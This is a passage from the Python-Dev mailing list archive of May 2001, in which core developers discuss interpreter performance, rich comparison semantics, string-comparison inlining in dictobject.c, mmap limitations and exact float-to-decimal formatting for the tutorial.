a cmp outcome was desired, it could compute it with no extra work to speak
of.  Then there would be no reason at all to hold on to the dict tp_compare
slot.

The list and tuple richcmps are also doing almost all the work needed to
compute a 3-way cmp outcome.


From tim.one at home.com  Sun May 20 13:05:53 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 07:05:53 -0400
Subject: [Python-Dev] Performance compares
In-Reply-To: <3B037D27.E258C363@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEFEKDAA.tim.one@home.com>

[M.-A. Lemburg]
> ...
> Running the same test for 2.1 vs. 2.0 there's not much to
> notice, so the important changes seem to be originating in
> the move from 1.5.2 to 2.0.

IIRC, Guido, Skip Montanaro and I put major effort into finding speedups for
1.5.2, and Fredrik did more independently (like inlining high-frequency int
operations in the eval loop).  Also IIRC, that's the last time any concerted
effort was put into speeding Python.  1.5.2 was an efficiency peak, then, and
unstable equilibrium never endures without deliberate and persistent
rebalancing work.  If Python were "a real product", it would be at least one
person's full-time job to keep it in peak shape.  But it's not even a
part-time job for anyone, and I don't see that changing.  In compensation,
machines have gotten faster much quicker than Python has slowed.


From mal at lemburg.com  Sun May 20 13:50:17 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sun, 20 May 2001 13:50:17 +0200
Subject: [Python-Dev] Performance compares
References: <LNBBLJKPBEHFEDALKOLCOEFEKDAA.tim.one@home.com>
Message-ID: <3B07AF79.6EB42E54@lemburg.com>

Tim Peters wrote:
> 
> [M.-A. Lemburg]
> > ...
> > Running the same test for 2.1 vs. 2.0 there's not much to
> > notice, so the important changes seem to be originating in
> > the move from 1.5.2 to 2.0.
> 
> IIRC, Guido, Skip Montanaro and I put major effort into finding speedups for
> 1.5.2, and Fredrik did more independently (like inlining high-frequency int
> operations in the eval loop).  Also IIRC, that's the last time any concerted
> effort was put into speeding Python.  1.5.2 was an efficiency peak, then, and
> unstable equilibrium never endures without deliberate and persistent
> rebalancing work.  If Python were "a real product", it would be at least one
> person's full-time job to keep it in peak shape.  But it's not even a
> part-time job for anyone, and I don't see that changing.  In compensation,
> machines have gotten faster much quicker than Python has slowed.

How about making performance the main "feature" for 2.3 then ?!

2.0 - 2.2 introduced many new features in the interpreter core,
so I think it's time to stabilize those features and focus on
making Python regain the performance it had before those features
were introduced. At least to some of us, performance is an
issue and I think that there's a lot we can do to improve it.

One way to open up the field for better performance will be
to modularize the interpreter, so that new ways of optimization
can be explored, e.g. truning the VM a register machine 
(Skip once started looking into this with his Rattlesnake
patches) or creating specialized VMs which can then be used
by optimizing compilers as targets.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mwh at python.net  Sun May 20 13:52:40 2001
From: mwh at python.net (Michael Hudson)
Date: 20 May 2001 12:52:40 +0100
Subject: [Python-Dev] Comparison speed
In-Reply-To: "Tim Peters"'s message of "Sun, 20 May 2001 05:54:08 -0400"
References: <LNBBLJKPBEHFEDALKOLCMEFBKDAA.tim.one@home.com>
Message-ID: <m3u22gkzjr.fsf@atrus.jesus.cam.ac.uk>

"Tim Peters" <tim.one at home.com> writes:

> Ah!  Of course.  string_compare is hardwired into lookdict_string.
> This case may be important enough to merit a distinct
> _PyString_Equal function, with just the stuff lookdict_string needs

Or just inlining it all into lookdict_string, something like:

Index: Objects/dictobject.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/dictobject.c,v
retrieving revision 2.90
diff -c -r2.90 dictobject.c
*** Objects/dictobject.c	2001/05/19 07:04:38	2.90
--- Objects/dictobject.c	2001/05/20 11:51:28
***************
*** 279,286 ****
  	register unsigned int mask = mp->ma_size-1;
  	dictentry *ep0 = mp->ma_table;
  	register dictentry *ep;
- 	cmpfunc compare = PyString_Type.tp_compare;
  
  	/* make sure this function doesn't have to handle non-string keys */
  	if (!PyString_Check(key)) {
  #ifdef SHOW_CONVERSION_COUNTS
--- 279,287 ----
  	register unsigned int mask = mp->ma_size-1;
  	dictentry *ep0 = mp->ma_table;
  	register dictentry *ep;
  
+ #define S(s) ((PyStringObject*)(s))
+ 
  	/* make sure this function doesn't have to handle non-string keys */
  	if (!PyString_Check(key)) {
  #ifdef SHOW_CONVERSION_COUNTS
***************
*** 299,305 ****
  		freeslot = ep;
  	else {
  		if (ep->me_hash == hash
! 		    && compare(ep->me_key, key) == 0) {
  			return ep;
  		}
  		freeslot = NULL;
--- 300,308 ----
  		freeslot = ep;
  	else {
  		if (ep->me_hash == hash
! 		    && S(ep->me_key)->ob_size == S(key)->ob_size
! 		    && memcmp(S(ep->me_key)->ob_sval,
! 			      S(key)->ob_sval,S(key)->ob_size) == 0) {
  			return ep;
  		}
  		freeslot = NULL;
***************
*** 318,324 ****
  		if (ep->me_key == key
  		    || (ep->me_hash == hash
  		        && ep->me_key != dummy
! 			&& compare(ep->me_key, key) == 0))
  			return ep;
  		else if (ep->me_key == dummy && freeslot == NULL)
  			freeslot = ep;
--- 321,329 ----
  		if (ep->me_key == key
  		    || (ep->me_hash == hash
  		        && ep->me_key != dummy
! 			&& S(ep->me_key)->ob_size == S(key)->ob_size
! 			&& memcmp(S(ep->me_key)->ob_sval,
! 				  S(key)->ob_sval,S(key)->ob_size) == 0))
  			return ep;
  		else if (ep->me_key == dummy && freeslot == NULL)
  			freeslot = ep;
***************
*** 327,332 ****
--- 332,339 ----
  		if (incr > mask)
  			incr ^= mp->ma_poly; /* clears the highest bit */
  	}
+ 
+ #undef S
  }
  
  /*

(apologies for the use of the preprocessor...).  I'll leave it to
someone else to work out if this is a win or not...

-- 
                    >> REVIEW OF THE YEAR, 2000 <<
                   It was shit. Give us another one.
                          -- NTK Know, 2000-12-29, http://www.ntk.net/


From tim.one at home.com  Sun May 20 14:57:11 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 08:57:11 -0400
Subject: [Python-Dev] Performance compares
In-Reply-To: <3B07AF79.6EB42E54@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEFJKDAA.tim.one@home.com>

[MAL]
> How about making performance the main "feature" for 2.3 then ?!

Guido may be a dictator, but he doesn't have a magic wand -- "the main
feature" is what people volunteer to do and then fight for and then actually
do.

> 2.0 - 2.2 introduced many new features in the interpreter core,
> so I think it's time to stabilize those features and focus on
> making Python regain the performance it had before those features
> were introduced.  At least to some of us, performance is an
> issue and I think that there's a lot we can do to improve it.

"Performance" is meaningless unless quantified and made concrete:  what is it
that runs too slowly?  "Everything" is not a useful answer.  Speeding up
line-at-a-time input was an example of something that worked, via focus and
measurement and pushing ahead despite opposition.  I doubt any other approach
will bear fruit over such a short timeframe, and especially not without
resources to throw at it.

> One way to open up the field for better performance will be
> to modularize the interpreter, so that new ways of optimization
> can be explored, e.g. truning the VM a register machine
> (Skip once started looking into this with his Rattlesnake
> patches) or creating specialized VMs which can then be used
> by optimizing compilers as targets.

Restructure the core for the benefit of optimizing compilers that don't
exist?  That sounds like an interesting research project, but not much to do
with making 2.3 faster.  In the meantime, modularization is more likely to
make the VM that does exist slower.

could-be-it's-easy-answers-or-none-ly y'rs  - tim


From tim.one at home.com  Sun May 20 14:58:09 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 08:58:09 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <m3u22gkzjr.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEFJKDAA.tim.one@home.com>

[Michael Hudson]
> ...
> (apologies for the use of the preprocessor...).  I'll leave it to
> someone else to work out if this is a win or not...

Umm, but that's the *hard* part.  I think even Guido knows how to do a string
compare inline <wink>.


From tim.one at home.com  Sun May 20 15:09:50 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 09:09:50 -0400
Subject: [Python-Dev] explanations for more pybench slowdowns
In-Reply-To: <200105182107.RAA16214@cliff.concentric.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEFKKDAA.tim.one@home.com>

[Jeremy Hylton]
> ...
> The scary thing about BuiltinFunctinoCalls is that the profiler shows
> it spending almost 30% of its time in PyArg_ParseTuple().  It
> certainly is a shame that we have this complicated, slow run-time
> parsing mechanism to deal with a static property of the code, namely
> how many arguments it takes and whether their types are.

Special-casing the snot out of "O" looks like a winner <wink>:

  count     format %total  cumulative%
-------   -------- ------  -----------
1440897        'O'  47.45  47.45
 327694       'O!'  10.79  58.24
 285570      'O|i'   9.40  67.65
 262168     'O!|O'   8.63  76.28
 227405        'l'   7.49  83.77
 146537       's#'   4.83  88.60
  76779     'OO|O'   2.53  91.12
  65682      '|ss'   2.16  93.29
  48033       'OO'   1.58  94.87
  39879   'O|O&O&'   1.31  96.18

Those are the top 10 formats passed to PyArg_ParseTuple() during the test
suite, after stripping ";" and ":" decorations.

fast-paths-on-the-overtired-brain-ly y'rs  - tim


From aahz at rahul.net  Sun May 20 15:50:08 2001
From: aahz at rahul.net (Aahz Maruch)
Date: Sun, 20 May 2001 06:50:08 -0700 (PDT)
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEFCKDAA.tim.one@home.com> from "Tim Peters" at May 20, 2001 06:13:14 AM
Message-ID: <20010520135008.12ABE99C80@waltz.rahul.net>

Tim Peters wrote:
> 
> If the time machine batteries can hold a full charge, you may want
> to go back and add Py_CMP as a seventh possible desired-operation
> argument to tbe rich comparison API.  My experience with dict
> comparisons was that dict_richcompare couldn't compute Py_LT/LE/GT/GE
> any cheaper than by doing a full cmp, so I put the dict oldcmp back in
> order to avoid having dict richcmp (potentially) compute cmp 3 times
> to fake one cmp.  But if dict richcmp knew a cmp outcome was desired,
> it could compute it with no extra work to speak of.  Then there would
> be no reason at all to hold on to the dict tp_compare slot.
>
> The list and tuple richcmps are also doing almost all the work needed
> to compute a 3-way cmp outcome.

+1 from me; there's one spot in my new Decimal.py where I optimize an
expensive pair of equality tests down to one by using cmp(), and it's
likely that similar cases will pop up.  When I convert to C code, I'll
want to keep doing that.
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.


From martin at loewis.home.cs.tu-berlin.de  Sun May 20 15:48:43 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sun, 20 May 2001 15:48:43 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
Message-ID: <200105201348.f4KDmh102375@mira.informatik.hu-berlin.de>

> string_compare() could special-case pointer equality too, although I suspect
> doing so would be a net loss.

I've done some measurements here, too, again taking your example

from time import clock

indices = [1] * 1000000

def doit():
    s = clock()
    for i in indices:
        "ab" < "ab"
    f = clock()
    return f - s

for i in xrange(10):
    print "%.3f" % doit()

This is the case where testing for identity helps. Running it without
identity test takes 0.74s, running it with identity test takes 0.68s.

Now, looking at the case of non-identical pointers, I could not find
any measurable difference. After increasing the number of rounds by a
factor of ten, I got, without identity test

6.920
6.920
6.910
6.970
7.080
6.920
6.920
6.910
6.930
6.920

With identity test, I got

6.930
6.930
6.920
7.080
6.920
6.930
6.960
6.930
6.920
6.920

That still does not look like a significant difference to me.

Regards,
Martin


From guido at digicool.com  Sun May 20 15:56:54 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sun, 20 May 2001 09:56:54 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Sun, 20 May 2001 06:13:14 EDT."
             <LNBBLJKPBEHFEDALKOLCGEFCKDAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCGEFCKDAA.tim.one@home.com> 
Message-ID: <200105201356.JAA08372@cj20424-a.reston1.va.home.com>

> If the time machine batteries can hold a full charge, you may want to go back
> and add Py_CMP as a seventh possible desired-operation argument to tbe rich
> comparison API.

Funny, I was thinking about this too last night.

> My experience with dict comparisons was that dict_richcompare
> couldn't compute Py_LT/LE/GT/GE any cheaper than by doing a full
> cmp, so I put the dict oldcmp back in order to avoid having dict
> richcmp (potentially) compute cmp 3 times to fake one cmp.  But if
> dict richcmp knew a cmp outcome was desired, it could compute it
> with no extra work to speak of.  Then there would be no reason at
> all to hold on to the dict tp_compare slot.

I'm not sure I see the saving.  There's no real saving in time,
because you still have to make separate calls for EQ and CMP, right?

There might be a saving in code, but you could solve that internally
in dictobject.c by restructuring the code somewhat so that
dict_compare shared more with dict_richcompare, right?

It's mostly an API streamlining.  The other difference between
tp_compare and tp_richcompare is that the latter returns an object
which makes testing for errors unambiguous.

But (for several releases) we would still have to support tp_compare
for b/w compatibility with old 3r party extensions.

> The list and tuple richcmps are also doing almost all the work needed to
> compute a 3-way cmp outcome.

Ditto.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal at lemburg.com  Sun May 20 18:19:29 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sun, 20 May 2001 18:19:29 +0200
Subject: [Python-Dev] Performance compares
References: <LNBBLJKPBEHFEDALKOLCAEFJKDAA.tim.one@home.com>
Message-ID: <3B07EE91.5747F4F4@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > How about making performance the main "feature" for 2.3 then ?!
> 
> Guido may be a dictator, but he doesn't have a magic wand -- "the main
> feature" is what people volunteer to do and then fight for and then actually
> do.

I will certainly go back to the basics and redo my optimization
patches for Python later this year. Whether or not these will
get included in the core is another story, but I have a need for
a fast interpreter for my app. server and can't afford losing
too much performance when moving from 1.5.x to 2.x.
 
> > 2.0 - 2.2 introduced many new features in the interpreter core,
> > so I think it's time to stabilize those features and focus on
> > making Python regain the performance it had before those features
> > were introduced.  At least to some of us, performance is an
> > issue and I think that there's a lot we can do to improve it.
> 
> "Performance" is meaningless unless quantified and made concrete:  what is it
> that runs too slowly?  "Everything" is not a useful answer.  Speeding up
> line-at-a-time input was an example of something that worked, via focus and
> measurement and pushing ahead despite opposition.  I doubt any other approach
> will bear fruit over such a short timeframe, and especially not without
> resources to throw at it.

Let's put it this way: if pystone gets a 50% boost, then all
applications should benefit from it regardeless whether they
are function call intense or fiddle with a lot of attributes.
Achieving those 50% will be a lot harder than for the 1.5
series, though ;-)
 
> > One way to open up the field for better performance will be
> > to modularize the interpreter, so that new ways of optimization
> > can be explored, e.g. truning the VM a register machine
> > (Skip once started looking into this with his Rattlesnake
> > patches) or creating specialized VMs which can then be used
> > by optimizing compilers as targets.
> 
> Restructure the core for the benefit of optimizing compilers that don't
> exist?  That sounds like an interesting research project, but not much to do
> with making 2.3 faster.  In the meantime, modularization is more likely to
> make the VM that does exist slower.

Depends on how you look at it: extension writers will then
have the possibility of plugging in new compilers and VMs
into Python to experiment with new optimization strategies.

The Rattlesnake project is one such project which would do
great with this plugin logic since it uses special opcodes
which an optimizer generates and then needs a modified VM
to execute these new byte code streams...

from Rattlesnake import compiler, vm
sys.use_compiler(compiler)
sys.use_vm(vm)

This won't make stock Python 2.3 faster, but at least provide
better means for experiments in that direction.
Alternative VM implementations like Stackless Python would 
also benefit from it.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From tim.one at home.com  Sun May 20 23:13:04 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 17:13:04 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105201348.f4KDmh102375@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEGHKDAA.tim.one@home.com>

[Martin v. Loewis, on pointer-equality tests in string_compare()]

> I've done some measurements here, too, again taking your example
> ...
>     for i in indices:
>         "ab" < "ab"
> ...
> This is the case where testing for identity helps. Running it without
> identity test takes 0.74s, running it with identity test takes 0.68s.

This stuff all ties together.  A pointer-equality test in string_compare() is
guaranteed to lose every time string_compare() gets called from
lookdict_string().  Let's lose string_compare() entirely (in favor of a
self-contained-- apart from memcmp() --string_richcompare).


From tim.one at home.com  Sun May 20 23:37:09 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 17:37:09 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105201356.JAA08372@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEGIKDAA.tim.one@home.com>

[Tim, muses about a Py_CMP value for rich comparisons, and talks
 mostly about dict comps]

> ...
> I'm not sure I see the saving.  There's no real saving in time,
> because you still have to make separate calls for EQ and CMP, right?

Right so far as it goes.  A "fast path" (which currently doesn't exist but is
clearly worth adding, based on both my and Martin's timings) for doing *all*
kinds of same-type comparisons would only have to look for a richcompare
slot, though, not one kind of slot in some cases and another in others.
Uniformity is contagious <wink>.

> There might be a saving in code, but you could solve that internally
> in dictobject.c by restructuring the code somewhat so that
> dict_compare shared more with dict_richcompare, right?

Right, there would be no reduction in total code, and the dict routines
already share as much as possible.  In effect, the body of dict_compare would
replace the last

		res = Py_NotImplemented;

line in the (currently tiny) dict_richcompare guarded by the appropriate
tests.

> It's mostly an API streamlining.

Bingo, and the possibility of retiring the tp_compare slot in P3K.

> The other difference between tp_compare and tp_richcompare is that
> the latter returns an object which makes testing for errors unambiguous.

Also cool.

> But (for several releases) we would still have to support tp_compare
> for b/w compatibility with old 3r party extensions.

Sure, although the way the CVS branch code is going it could be that 2.2 is
the long-awaited utterly incompatible P3K anyway <wink>.

>> The list and tuple richcmps are also doing almost all the work needed
>> to compute a 3-way cmp outcome.

> Ditto.

Oh no!  Those aren't like dict compares.  A rich compare for sequence types
(whether strings or lists) *has* to contain almost all the code necessary to
implement cmp(), because just resolving Py_EQ in all cases has to find "the
first" element (if any) that differs.  Once that's known, you're at most one
measly element compare away from producing the right cmp() outcome.  This
isn't true of dict compares:  the algorithm for resolving dict Py_EQ/Py_NE
when the dict sizes are the same doesn't do anything to help resolve general
cmp().  Yes, a tp_compare slot could be re-added to lists and tuples, and
implemented via refactoring their current tp_richcompare code into a common
internal routine, but then we've just added another layer of function calls
for all cases.  I've timed C function calls, and it turns out they aren't
actually free <wink>.


From tim.one at home.com  Mon May 21 09:53:24 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 21 May 2001 03:53:24 -0400
Subject: [Python-Dev] RE: Rich comparison of lists and tuples
In-Reply-To: <200105162035.PAA04299@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEHFKDAA.tim.one@home.com>

[Guido]
> I would like to break this down by defining the mapping between cmp()
> and rich comparisons.

Good idea!

> I propose:
>
> - If cmp() is requested but not defined, and rich comparisons are
>   defined, try ==, <, > in order; if all three yield false, act as if
>   rich comparisons were not defined, and use the fallback comparison
>   (i.e. by address).

Here and below didn't cover the case where cmp() is requested and is defined.
I believe it's agreed now (but wasn't yet at the time you wrote this) that
cmp() will be called in that case (and which requires changes to the current
implementation).

> - If a rich comparison is requested but not defined, use cmp() and use
>   the obvious mapping.

Cool, except this is missing what I believe was intended detail, like that
when given "x < y" and x.__lt__ is not implemented then y.__gt__ will be
tried before falling back to cmp().  Also note this today:

class C:
    def __lt__(x, y):
        print "in __lt__"
        return NotImplemented

    def __gt__(x, y):
        print "in __gt__"
        return NotImplemented

C() < C()

That prints

in __lt__
in __gt__
in __gt__
in __lt__

I don't know to explain why each method gets called twice (well, I do, but
it's hard to swallow <wink>).  Again this can have semantic consequences,
e.g. if the methods have side-effects; and unclear whether this is intended,
a bug, or implementation-defined.

> - Continue to define the comparison of unequal sequences in terms of
>   cmp().

"the comparison" is ambiguous there:  you mean all comparisons?  just cmp()
comparisons?  just rich comparisons?

In any case, also unclear what "in terms of cmp()" means:  that every pair of
corresponding elements must be compared via cmp()?  Or that only the first
non-Py_EQ pair must be compared via cmp()?  Pseudo-code would be much clearer
than English here.

> - Testing == or != for sequences takes these shortcuts:

Must take these shortcuts, or may take these shortcuts?

>   1. if the lengths differ, the sequences differ

Note that I removed the tuple_richcompare code for doing this, because I
never found a case where tuples were compared via Py_EQ/Py_NE and the lengths
differed.  So the length-check in this case was a waste of time.  It isn't
true of lists or strings that it's a waste of time, but I believe there are
strong reasons for why programs simply will not compare different-sized
tuples for equality.  I would not like to pay for tuple length checks if only
one case in 500 billion would benefit, but if #1 is a mandatory shortcut
there's no choice.

>   2. compare the elements using == until a false return is found

Currently the sequence rich-compare code does #2 for all 6 comparison
operators.  Is that wrong?  Looked reasonable to me!

> Note that this defines 'x!=y' as 'not x==y' for sequences.  We could
> easily go the extra mile and define != to use only != on the items;
> but is this worth the extra complexity?

Not at all:  tuples and lists are Python's sequence types, so Python is
entitled to define what comparison means for them in any way it likes.  We've
already got cases where (see the first msg in this thread)

    [x] cmpop [y]

may yield a different result than

    x cmpop y

so we've already punted on doing the best-possible job of mimicking whatever
crazy-ass comparisons user-defined objects implement, when those objects are
contained in Python sequences.

My bias is showing <wink>:  I want Python's builtin sequence types to be as
efficient as possible.

Nasty example:  two conformable (same rank and dimensions) NumPy matrices A
and B return a conformable matrix of 0/1 bits when compared via "<" (well,
maybe they actually don't, but that's what drove richcmps to begin with!).
It may well be *convenient* for them if

    (A1, A2, A3) < (B1, B2, B3)

always returned a list (or tuple) of 3 0/1 matrices too:

    [A1 < B1, A2 < B2, A3 < B3]

So builtin sequence comparisons can't be all things to all people regardless.


From Barrett at stsci.edu  Mon May 21 14:17:09 2001
From: Barrett at stsci.edu (Paul Barrett)
Date: Mon, 21 May 2001 08:17:09 -0400
Subject: [Python-Dev] mmap module
References: <LNBBLJKPBEHFEDALKOLCAEOKKCAA.tim.one@home.com>
Message-ID: <3B090745.5D70353E@STScI.Edu>

Tim Peters wrote:
> 
> [Paul Barrett]
> > In the CVS log of the mmapmodule.c, Tim Peters says:
> >
> > "The code really needs to be rethought from scratch (not by me, though
> > ...)."
> 
> That was in specific reference to the code I changed, in mmap_find_method.
> The difficulty is that mmap is great for "large files", but the code before
> my change used a C int for the starting offset and also for the return      > value; I boosted those to a C long, which covers 63 bits on 64-bit Linux     > boxes, but doesn't help 64-bit Windows at all (where a C long remains 4      > bytes).  The mmap_object struct uses size_t to declare the relevant members, > which is possibly better still than C long, but may still leave platform     > capabilities out of reach for large files (e.g., "even Win95" *allows*       > specifying 64-bit offsets when creating a mapped file view).  C is a         > friggin' mess here, and Python's PyArg_ParseTuple() and Py_BuildValue()     > don't cater to the full range of C integral types anyway.  In other words,  > if this code is ever to reach its full potential, it "really needs to be     > rethought from scratch".

OK, thanks for the clarification.

> > The ability to have offsets into a file that are not multiples of the
> > system pagesize would also be nice.
> 
> It's OS-specific.  Python should grow warts to protect against it on the     > OSes that care.

Well, hopefully the OS-differences wouldn't prevent implementing a
more abstract interface.

> > I'd be willing to submit a PEP on a new mmapmodule, once I know what
> > others would like.
> 
> Hard to say.  This has the potential to become Python's next thread
> subsystem, i.e. an endless and ultimately hopeless x-platform nightmare.  If
> you do write a PEP, I vote to say that we'll cover Windows and Linux (and
> maybe Mac OS X?) out of the box, but any other platform is at your own risk
> (it doesn't really help if somebody pops up volunteering to support a
> minority platform, because they eventually go away, their code stops         > working, and it never gets fixed -- so it's use-at-your-own-risk in reality
> regardless).

Yes, I agree.  Windows, Unix/Linux, and Mac OS X should be the
supported platforms.

My intention is not to make major changes to the Python interface, but
to fix bugs and to implement some additional features, such as a
non-pagesize file offset.  I'll try to get something written up in the
near future.

-- 
Paul Barrett, PhD      Space Telescope Science Institute
Phone: 410-338-4475    ESS/Science Software Group
FAX:   410-338-4767    Baltimore, MD 21218


From martin at loewis.home.cs.tu-berlin.de  Mon May 21 18:44:59 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 21 May 2001 18:44:59 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEGHKDAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCCEGHKDAA.tim.one@home.com>
Message-ID: <200105211644.f4LGixA00818@mira.informatik.hu-berlin.de>

> This stuff all ties together.  A pointer-equality test in string_compare() is
> guaranteed to lose every time string_compare() gets called from
> lookdict_string().  Let's lose string_compare() entirely (in favor of a
> self-contained-- apart from memcmp() --string_richcompare).

Ok. I've now updated my patch on SF to remove string_compare, inline
everything into string_richcompare, add _PyString_Eq, and use that in
lookdict_string. Who would want to review and approve/reject this
patch?

Regards,
Martin


From martin at loewis.home.cs.tu-berlin.de  Mon May 21 19:03:59 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 21 May 2001 19:03:59 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEFBKDAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCCEFBKDAA.tim.one@home.com>
Message-ID: <200105211703.f4LH3xD01154@mira.informatik.hu-berlin.de>

> Note that the usual way to write this is
> 
>  		if (c < 0 && PyErr_Occurred())
> 
> More work for my artificial "ab" < "cd" case but a net win in real life (when
> c >= 0, it's an internal error if PyErr_Occurred() were to return true; alas,
> when c < 0 there's no way in the cmp protocol to use c's value alone to
> distinguish between "less than" and "error").

Ok. I've updated my tp_compare patch on SF to do so; it also
un-deprecates UserList.__cmp__.

> > Here, I get 3 function calls: f is string_compare, then
> > PyErr_Occurred, finally convert_3way_to_object, which converts
> > {-1,0,1} x Op -> {Py_True, Py_False}.
> 
> Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf.

Any reason why PyThreadState_GET isn't used there?

> There's no danger of over-indexing when ob_size==0, because it doesn't
> include the trailing null byte Python always sticks at the end of string
> objects; and the first-byte check is much more likely to pay off than the
> zero-length check (comparison to a null string?  gotta be rare as clear
> conclusions <wink>), and better to test for the more common case first.

This is now also in the string_richcompare patch on SF.

Regards,
Martin


From tim.one at home.com  Mon May 21 20:29:02 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 21 May 2001 14:29:02 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Doc/tut tut.tex,1.133.2.1,1.133.2.2
In-Reply-To: <200105211805.f4LI54T20962@odiug.digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEJAKDAA.tim.one@home.com>

[Fred checkin]
> > ***************
> > *** 2610,2617 ****
> >   \begin{verbatim}
> >   >>> x = 10 * 3.14
> > ! >>> y = 200*200
> >   >>> s = 'The value of x is ' + `x` + ', and y is ' + `y` + '...'
> >   >>> print s
> > ! The value of x is 31.4, and y is 40000...
> >   >>> # Reverse quotes work on other types besides numbers:
> >   ... p = [x, y]
> > --- 2610,2617 ----
> >   \begin{verbatim}
> >   >>> x = 10 * 3.14
> > ! >>> y = 200 * 200
> >   >>> s = 'The value of x is ' + `x` + ', and y is ' + `y` + '...'
> >   >>> print s
> > ! The value of x is 31.400000000000002, and y is 40000...
> >   >>> # Reverse quotes work on other types besides numbers:
> >   ... p = [x, y]

[Guido]
> Hmm...  The tutorial now contains at least one example of floating
> point imprecision.  Does it also contain text to explain this?  (I'm
> sure Tim would be happy to provide some if there isn't any. :-)

[Fred]
> It contains others, and I don't think there's an explanation.  Some
> text from Tim to explain this would be greatly apprectiated!

Actually, 31.400000000000002 wasn't a true improvement over the earlier 31.4:
so long as we rely on the platform C to format floats, the output isn't
well-defined (the last digit or so can and will vary across boxes).

I can certainly explain that this is so, and even why, but unsure the
tutorial is the right place for it.  In any case the tutorial shouldn't be
giving examples whose output is platform-dependent.  For example, don't use
10 * 3.14, use 10 * 3.25.  Want me to scour the tutorial for all such cases?

Or we could put the attached function at the start of the tutorial and use it
to format floats:

>>> f2ds(10 * 3.14)
'31400000000000002131628207280300557613372802734375e-48'
>>>

I'm sure newbies would feel assured by that <wink>.


def f2ds(x):
    """Return float x as exact decimal string.

    The string is of the form:
        "-", if and only if x is < 0.
        One or more decimal digits.  The last digit is not 0 unless x is 0.
        "e"
        The exponent, a (possibly signed) integer
    """

    import math
    # XXX ignoring infinities and NaNs for now.

    if x == 0:
        return "0e0"

    sign = ""
    if x < 0:
        sign = "-"
        x = -x

    f, e = math.frexp(x)
    assert 0.5 <= f < 1.0
    # x = f * 2**e exactly

    # Suck up CHUNK bits at a time; 28 is enough so that we suck
    # up all bits in 2 iterations for all known binary double-
    # precision formats, and small enough to fit in an int.
    CHUNK = 28
    top = 0L
    # invariant: x = (top + f) * 2**e exactly
    while f:
        f = math.ldexp(f, CHUNK)
        digit = int(f)
        assert digit >> CHUNK == 0
        top = (top << CHUNK) | digit
        f -= digit
        assert 0.0 <= f < 1.0
        e -= CHUNK
    assert top > 0

    # Now x = top * 2**e exactly.  Get rid of trailing 0 bits if e < 0
    # (purely to increase efficiency a little later -- this loop can
    # be removed without changing the result).
    while e < 0 and top & 1 == 0:
        top >>= 1
        e += 1

    # Transform this into an equal value top' * 10**e'.
    if e > 0:
        top <<= e
        e = 0
    elif e < 0:
        # Exact is top/2**-e.  Multiply top and bottom by 5**-e to
        # get top*5**-e/10**-e = top*5**-e * 10**e
        top *= 5L**-e

    # Nuke trailing (decimal) zeroes.
    while 1:
        assert top > 0
        newtop, rem = divmod(top, 10L)
        if rem:
            break
        top = newtop
        e += 1

    return "%s%de%d" % (sign, top, e)


From guido at digicool.com  Mon May 21 21:02:43 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 15:02:43 -0400
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Doc/tut tut.tex,1.133.2.1,1.133.2.2
In-Reply-To: Your message of "Mon, 21 May 2001 14:29:02 EDT."
